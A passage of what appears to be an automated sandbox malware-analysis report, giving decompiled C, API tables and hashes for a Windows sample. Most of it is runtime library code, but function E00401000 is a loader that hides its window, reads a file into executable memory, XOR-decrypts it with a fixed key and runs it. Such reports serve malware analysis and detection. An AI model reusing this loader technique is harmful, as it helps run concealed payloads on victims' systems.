								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E0040A5F5(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x417ed8 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x417ed8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x417ed8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x417ed8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x417ed8 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E0040A848();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x417ed8 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00405119(GetLastError());
											 *( *((intOrPtr*)(0x417ed8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x417ed8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00408B22( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E0040AA57(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0040CD17(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00405119(_t271);
							 *( *((intOrPtr*)(0x417ed8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x417ed8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E0040514F(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x417ed8 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00405119(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E0040A848();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0040513C(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E0040514F(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E0040513C(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E0040514F(_t289)));
				}
			}


























































                                                                                            0x0040abb2
                                                                                            0x0040abb6
                                                                                            0x0040abb7
                                                                                            0x0040abb7
                                                                                            0x0040abb7
                                                                                            0x0040abb9
                                                                                            0x0040abbc
                                                                                            0x0040abbf
                                                                                            0x0040abda
                                                                                            0x0040abdf
                                                                                            0x0040abe2
                                                                                            0x0040abe4
                                                                                            0x0040abe6
                                                                                            0x0040ac05
                                                                                            0x0040ac0c
                                                                                            0x0040ac13
                                                                                            0x0040ac16
                                                                                            0x0040ac22
                                                                                            0x0040ac25
                                                                                            0x0040ac2d
                                                                                            0x0040ac2e
                                                                                            0x0040ac31
                                                                                            0x0040ac31
                                                                                            0x0040ac33
                                                                                            0x0040ac38
                                                                                            0x0040ac3a
                                                                                            0x0040ac3d
                                                                                            0x0040ac45
                                                                                            0x0040ac48
                                                                                            0x0040acb5
                                                                                            0x0040acb6
                                                                                            0x0040acbc
                                                                                            0x0040acbe
                                                                                            0x0040ad07
                                                                                            0x0040ad0a
                                                                                            0x0040ad13
                                                                                            0x0040ad16
                                                                                            0x0040ad19
                                                                                            0x0040ad1b
                                                                                            0x0040ad1b
                                                                                            0x0040ad1b
                                                                                            0x0040ad0c
                                                                                            0x0040ad0f
                                                                                            0x0040ad0f
                                                                                            0x0040ad20
                                                                                            0x0040ad23
                                                                                            0x0040ad2f
                                                                                            0x0040ad34
                                                                                            0x0040ad40
                                                                                            0x0040ad4a
                                                                                            0x0040ad4e
                                                                                            0x0040ad58
                                                                                            0x0040ad5b
                                                                                            0x0040ad66
                                                                                            0x0040ad6b
                                                                                            0x0040ad8a
                                                                                            0x0040ad8d
                                                                                            0x0040ad91
                                                                                            0x0040ad92
                                                                                            0x0040ad98
                                                                                            0x0040ad9d
                                                                                            0x0040ada0
                                                                                            0x0040ada2
                                                                                            0x0040ada4
                                                                                            0x0040ada9
                                                                                            0x0040adab
                                                                                            0x0040adad
                                                                                            0x0040adb0
                                                                                            0x0040adb2
                                                                                            0x0040adcc
                                                                                            0x0040adf0
                                                                                            0x0040adf4
                                                                                            0x0040adf8
                                                                                            0x0040adfa
                                                                                            0x0040adfe
                                                                                            0x0040ae00
                                                                                            0x0040ae0a
                                                                                            0x0040ae0d
                                                                                            0x0040ae14
                                                                                            0x0040ae14
                                                                                            0x0040ae14
                                                                                            0x0040ae14
                                                                                            0x0040adfe
                                                                                            0x0040ae19
                                                                                            0x0040ae25
                                                                                            0x0040ae27
                                                                                            0x0040aeb2
                                                                                            0x0040aeb2
                                                                                            0x00000000
                                                                                            0x0040ae2d
                                                                                            0x0040ae2d
                                                                                            0x0040ae31
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040ae36
                                                                                            0x0040ae48
                                                                                            0x0040ae50
                                                                                            0x0040ae53
                                                                                            0x0040ae54
                                                                                            0x0040ae57
                                                                                            0x0040ae5e
                                                                                            0x0040ae63
                                                                                            0x0040ae66
                                                                                            0x0040ae9a
                                                                                            0x0040aea4
                                                                                            0x0040aea4
                                                                                            0x0040aeae
                                                                                            0x00000000
                                                                                            0x0040aeae
                                                                                            0x0040ae6f
                                                                                            0x0040ae88
                                                                                            0x0040ae8f
                                                                                            0x0040acaf
                                                                                            0x00000000
                                                                                            0x0040acaf
                                                                                            0x0040ae27
                                                                                            0x0040adb4
                                                                                            0x00000000
                                                                                            0x0040ad6d
                                                                                            0x0040ad74
                                                                                            0x0040ad77
                                                                                            0x0040ad79
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040ad7b
                                                                                            0x0040ad7d
                                                                                            0x0040ad7d
                                                                                            0x00000000
                                                                                            0x0040ad83
                                                                                            0x0040ad6b
                                                                                            0x0040acc6
                                                                                            0x0040acc9
                                                                                            0x0040ace4
                                                                                            0x0040ace9
                                                                                            0x0040acef
                                                                                            0x0040acf1
                                                                                            0x0040acfc
                                                                                            0x0040acfc
                                                                                            0x00000000
                                                                                            0x0040acf1
                                                                                            0x0040ac4a
                                                                                            0x0040ac51
                                                                                            0x0040ac53
                                                                                            0x0040ac8a
                                                                                            0x0040ac8a
                                                                                            0x0040ac94
                                                                                            0x0040ac97
                                                                                            0x0040ac9e
                                                                                            0x0040ac9e
                                                                                            0x0040ac9e
                                                                                            0x0040acaa
                                                                                            0x00000000
                                                                                            0x0040acaa
                                                                                            0x0040ac55
                                                                                            0x0040ac59
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040ac5b
                                                                                            0x0040ac6a
                                                                                            0x0040ac6f
                                                                                            0x0040ac72
                                                                                            0x0040ac73
                                                                                            0x0040ac76
                                                                                            0x0040ac76
                                                                                            0x0040ac7d
                                                                                            0x0040ac7f
                                                                                            0x0040ac82
                                                                                            0x0040ac85
                                                                                            0x0040ac88
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040abe8
                                                                                            0x0040abed
                                                                                            0x0040abf0
                                                                                            0x0040abf7
                                                                                            0x00000000
                                                                                            0x0040abf7
                                                                                            0x0040abc1
                                                                                            0x0040abc1
                                                                                            0x0040abc6
                                                                                            0x0040abc6
                                                                                            0x0040abcc
                                                                                            0x0040abce
                                                                                            0x00000000
                                                                                            0x0040abd3

                                                                                            APIs
                                                                                              • Part of subcall function 0040A848: CreateFileW.KERNELBASE(00000000,00000000,?,0040AC38,?,?,00000000,?,0040AC38,00000000,0000000C), ref: 0040A865
                                                                                            • GetLastError.KERNEL32 ref: 0040ACA3
                                                                                            • __dosmaperr.LIBCMT ref: 0040ACAA
                                                                                            • GetFileType.KERNELBASE(00000000), ref: 0040ACB6
                                                                                            • GetLastError.KERNEL32 ref: 0040ACC0
                                                                                            • __dosmaperr.LIBCMT ref: 0040ACC9
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040ACE9
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040AE36
                                                                                            • GetLastError.KERNEL32 ref: 0040AE68
                                                                                            • __dosmaperr.LIBCMT ref: 0040AE6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                            • String ID:
                                                                                            • API String ID: 4237864984-0
                                                                                            • Opcode ID: e9c1b9946d10ff1d9de36135bf5da059abe0f8da4556974fc8149ae3a1a8393e
                                                                                            • Instruction ID: f4f10318551b11701ff846d0932bc54cc66f20b9d573f373b01884424836d9c1
                                                                                            • Opcode Fuzzy Hash: e9c1b9946d10ff1d9de36135bf5da059abe0f8da4556974fc8149ae3a1a8393e
                                                                                            • Instruction Fuzzy Hash: 81A1F532A142449FCF19AF68DC517AE3BA1AB46314F14416EF811BB3D1CB389D26CB5A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401000 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            C-Code - Quality: 77%
                                                                                            			E00401000(intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				long _v16;
				void* _v20;
				char* _v24;
				struct HWND__* _t32;
				intOrPtr _t36;
				long _t39;
				void* _t42;
				void* _t51;
				void* _t68;
				void* _t69;

				_v8 = 0;
				_v16 = 0;
				_v24 = "248058040134";
				__imp__GetConsoleWindow(); // executed
				ShowWindow(_t32, 0); // executed
				_t36 = E00402E3C( *((intOrPtr*)(_a8 + (4 << 0))), 0x417084); // executed
				_v12 = _t36;
				E00403430( *((intOrPtr*)(_a8 + (4 << 0))), _v12, 0, 2); // executed
				_t39 = E00403A4C(_t51,  *((intOrPtr*)(_a8 + (4 << 0))), _t68, _t69, 4, _v12); // executed
				_v16 = _t39;
				E00403430(_v12, _v12, 0, 0); // executed
				_t42 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
				_v20 = _t42;
				E00403039(_v20, _v16, 1, _v12); // executed
				while(_v8 < _v16) {
					asm("cdq");
					 *(_v20 + _v8) =  *(_v20 + _v8) & 0x000000ff ^ _v24[_v8 % 0xc] & 0x000000ff;
					_v8 = _v8 + 1;
				}
				goto __eax;
			}















                                                                                            0x00401006
                                                                                            0x0040100d
                                                                                            0x00401014
                                                                                            0x0040101d
                                                                                            0x00401024
                                                                                            0x0040103e
                                                                                            0x00401046
                                                                                            0x00401051
                                                                                            0x0040105d
                                                                                            0x00401065
                                                                                            0x00401070
                                                                                            0x00401085
                                                                                            0x0040108b
                                                                                            0x0040109c
                                                                                            0x004010a4
                                                                                            0x004010af
                                                                                            0x004010cf
                                                                                            0x004010d7
                                                                                            0x004010d7
                                                                                            0x004010df

                                                                                            APIs
                                                                                            • GetConsoleWindow.KERNELBASE(00000000), ref: 0040101D
                                                                                            • ShowWindow.USER32(00000000), ref: 00401024
                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401085
                                                                                            • __fread_nolock.LIBCMT ref: 0040109C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AllocConsoleShowVirtual__fread_nolock
                                                                                            • String ID: 248058040134$tpA
                                                                                            • API String ID: 494509129-1241106090
                                                                                            • Opcode ID: 8d4af708522e2583ae88982dcf19a6b3344493a541b290dbf55a226e08ea99af
                                                                                            • Instruction ID: ce365276c164877991c8b49cdd6db85b5024f2944ceb035d3ab51911f7309f85
                                                                                            • Opcode Fuzzy Hash: 8d4af708522e2583ae88982dcf19a6b3344493a541b290dbf55a226e08ea99af
                                                                                            • Instruction Fuzzy Hash: 36217FB4E00248EFDB04DF94C855FAEBB75AF48304F1080A9F605AB2C1D679AB00CB54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406A4A Relevance: 4.5, APIs: 3, Instructions: 49COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 192 406a4a-406a62 call 408bb3 195 406a64-406a69 call 40514f 192->195 196 406a75-406a8b SetFilePointerEx 192->196 203 406a6f-406a73 195->203 198 406a9c-406aa6 196->198 199 406a8d-406a9a GetLastError call 405119 196->199 202 406aa8-406abd 198->202 198->203 199->203 204 406ac2-406ac5 202->204 203->204
                                                                                            C-Code - Quality: 90%
                                                                                            			E00406A4A(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				intOrPtr _t28;
				signed int _t32;
				signed int _t33;
				signed int _t36;
				signed int _t39;

				_t36 = _a4;
				_push(_t32);
				_t15 = E00408BB3(_t36);
				_t33 = _t32 | 0xffffffff;
				_t41 = _t15 - _t33;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = (_v12 & _v8) - _t33;
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x38;
							_t28 =  *((intOrPtr*)(0x417ed8 + (_t36 >> 6) * 4));
							_t11 = _t28 + _t39 + 0x28;
							 *_t11 =  *(_t28 + _t39 + 0x28) & 0x000000fd;
							__eflags =  *_t11;
						}
					} else {
						E00405119(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E0040514F(_t41))) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}













                                                                                            0x00406a52
                                                                                            0x00406a55
                                                                                            0x00406a57
                                                                                            0x00406a5c
                                                                                            0x00406a60
                                                                                            0x00406a62
                                                                                            0x00406a75
                                                                                            0x00406a83
                                                                                            0x00406a89
                                                                                            0x00406a8b
                                                                                            0x00406aa4
                                                                                            0x00406aa6
                                                                                            0x00000000
                                                                                            0x00406aa8
                                                                                            0x00406aa8
                                                                                            0x00406ab3
                                                                                            0x00406ab6
                                                                                            0x00406abd
                                                                                            0x00406abd
                                                                                            0x00406abd
                                                                                            0x00406abd
                                                                                            0x00406a8d
                                                                                            0x00406a94
                                                                                            0x00000000
                                                                                            0x00406a99
                                                                                            0x00406a64
                                                                                            0x00406a69
                                                                                            0x00406a6f
                                                                                            0x00406a6f
                                                                                            0x00406a71
                                                                                            0x00406ac5

                                                                                            APIs
                                                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00401056,00000000,00000002,00401056,00000000,?,?,?,00406AF7,00000000,00000000,00401056,00000002), ref: 00406A83
                                                                                            • GetLastError.KERNEL32(?,00406AF7,00000000,00000000,00401056,00000002,?,004032E2,?,00000000,00000000,00000001,00401056,?,?,00403398), ref: 00406A8D
                                                                                            • __dosmaperr.LIBCMT ref: 00406A94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                            • String ID:
                                                                                            • API String ID: 2336955059-0
                                                                                            • Opcode ID: 8d64c3194ff5e9d14d2a7675377794289a8aaea2ed10a9f6c866c86f5bb75fdb
                                                                                            • Instruction ID: cbe6596e406cbaa6a8e5098f691067bc6668297bb4f054289633f46de3a438ae
                                                                                            • Opcode Fuzzy Hash: 8d64c3194ff5e9d14d2a7675377794289a8aaea2ed10a9f6c866c86f5bb75fdb
                                                                                            • Instruction Fuzzy Hash: FF014C337105146FCB05AF65DC0599E3B6ADBC6330B25426AF412BB2D0EA74DE518F58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040AB01 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 206 40ab01-40ab35 call 4076c9 call 4071b5 211 40ab37-40ab3a 206->211 212 40ab3c-40ab51 call 40ab8f 206->212 213 40ab5b-40ab5f 211->213 215 40ab56-40ab59 212->215 216 40ab61-40ab69 call 406fe2 213->216 217 40ab6a-40ab6e 213->217 215->213 216->217
                                                                                            C-Code - Quality: 91%
                                                                                            			E0040AB01(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t22;
				void* _t25;
				signed int _t28;
				signed int _t29;

				_t25 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(E004071B5(_t25, _a12,  &_v28, E004076C9(__edx, __eflags)) == 0) {
					_push(_a28);
					_t22 = E0040AB8F(_t25, __eflags, _a4, _a8, _v20, _a16, _a20, _a24); // executed
					_t29 = _t22;
				} else {
					_t29 = _t28 | 0xffffffff;
				}
				if(_v8 != 0) {
					E00406FE2(_v20);
				}
				return _t29;
			}













                                                                                            0x0040ab01
                                                                                            0x0040ab0c
                                                                                            0x0040ab0f
                                                                                            0x0040ab12
                                                                                            0x0040ab15
                                                                                            0x0040ab18
                                                                                            0x0040ab1b
                                                                                            0x0040ab35
                                                                                            0x0040ab3c
                                                                                            0x0040ab51
                                                                                            0x0040ab59
                                                                                            0x0040ab37
                                                                                            0x0040ab37
                                                                                            0x0040ab37
                                                                                            0x0040ab5f
                                                                                            0x0040ab64
                                                                                            0x0040ab69
                                                                                            0x0040ab6e

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID: W\@
                                                                                            • API String ID: 269201875-4133532399
                                                                                            • Opcode ID: 6893c00bfd4734dc805df9bbf0edb953664479d221fb31a470f3f702ef8310cf
                                                                                            • Instruction ID: 8f172c4b860448545f2de2c6f9ac5e2a71632d6bb4a6def770504abdcdc4da3e
                                                                                            • Opcode Fuzzy Hash: 6893c00bfd4734dc805df9bbf0edb953664479d221fb31a470f3f702ef8310cf
                                                                                            • Instruction Fuzzy Hash: 9A012172C00259AFCF01AFA98C019EE7FB5AB08354F14417AFA14B2191E6359A20DB96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406E45 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 220 406e45-406e4a 221 406e4c-406e64 220->221 222 406e72-406e7b 221->222 223 406e66-406e6a 221->223 225 406e8d 222->225 226 406e7d-406e80 222->226 223->222 224 406e6c-406e70 223->224 228 406eeb-406eef 224->228 227 406e8f-406e9c GetStdHandle 225->227 229 406e82-406e87 226->229 230 406e89-406e8b 226->230 231 406eab 227->231 232 406e9e-406ea0 227->232 228->221 233 406ef5-406ef8 228->233 229->227 230->227 235 406ead-406eaf 231->235 232->231 234 406ea2-406ea9 GetFileType 232->234 234->235 236 406eb1-406eba 235->236 237 406ecd-406edf 235->237 238 406ec2-406ec5 236->238 239 406ebc-406ec0 236->239 237->228 240 406ee1-406ee4 237->240 238->228 241 406ec7-406ecb 238->241 239->228 240->228 241->228
                                                                                            C-Code - Quality: 84%
                                                                                            			E00406E45() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x417ed8 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x417ecc; // 0x7cd740
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










                                                                                            0x00406e4a
                                                                                            0x00406e4c
                                                                                            0x00406e50
                                                                                            0x00406e59
                                                                                            0x00406e64
                                                                                            0x00406e74
                                                                                            0x00406e78
                                                                                            0x00406e7b
                                                                                            0x00406e8d
                                                                                            0x00406e7d
                                                                                            0x00406e80
                                                                                            0x00406e89
                                                                                            0x00406e82
                                                                                            0x00406e85
                                                                                            0x00406e85
                                                                                            0x00406e80
                                                                                            0x00406e8f
                                                                                            0x00406e97
                                                                                            0x00406e9c
                                                                                            0x00406eab
                                                                                            0x00406ea2
                                                                                            0x00406ea3
                                                                                            0x00406ea3
                                                                                            0x00406eaf
                                                                                            0x00406ecd
                                                                                            0x00406ed1
                                                                                            0x00406ed8
                                                                                            0x00406edf
                                                                                            0x00406ee1
                                                                                            0x00406ee4
                                                                                            0x00406ee4
                                                                                            0x00406eb1
                                                                                            0x00406eb1
                                                                                            0x00406eb4
                                                                                            0x00406eba
                                                                                            0x00406ec5
                                                                                            0x00406ec7
                                                                                            0x00406ec7
                                                                                            0x00406ebc
                                                                                            0x00406ebc
                                                                                            0x00406ebc
                                                                                            0x00406eba
                                                                                            0x00406e6c
                                                                                            0x00406e6c
                                                                                            0x00406e6c
                                                                                            0x00406eeb
                                                                                            0x00406eec
                                                                                            0x00406ef8

                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00406E91
                                                                                            • GetFileType.KERNELBASE(00000000), ref: 00406EA3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHandleType
                                                                                            • String ID:
                                                                                            • API String ID: 3000768030-0
                                                                                            • Opcode ID: adf87ceca8efd71bae48173177a9061e433eed683ef769b7d558fc84bdd0b2bf
                                                                                            • Instruction ID: a2c26f300fc7a30ab80f2a33f887054f712ec73147539a44ada60f9bd435b884
                                                                                            • Opcode Fuzzy Hash: adf87ceca8efd71bae48173177a9061e433eed683ef769b7d558fc84bdd0b2bf
                                                                                            • Instruction Fuzzy Hash: 3C1175395047414AC7308E3DCC886237A94AB56330B3A073BD5BBA66F1C33CD9A6D28D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403F84 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 242 403f84-403f8b 243 403f90-403f97 call 407f0f call 40832c 242->243 244 403f8d-403f8f 242->244 248 403f9c-403fa0 243->248 249 403fa2-403fa5 248->249 250 403fa7-403fb0 call 403fd7 248->250 251 403fcb-403fd6 call 406fe2 249->251 255 403fb2-403fb5 250->255 256 403fb7-403fbe 250->256 258 403fc3-403fca call 406fe2 255->258 256->258 258->251
                                                                                            C-Code - Quality: 92%
                                                                                            			E00403F84(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0x417e68 == 0) {
					_push(_t13);
					E00407F0F(__ebx); // executed
					_t2 = E0040832C(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
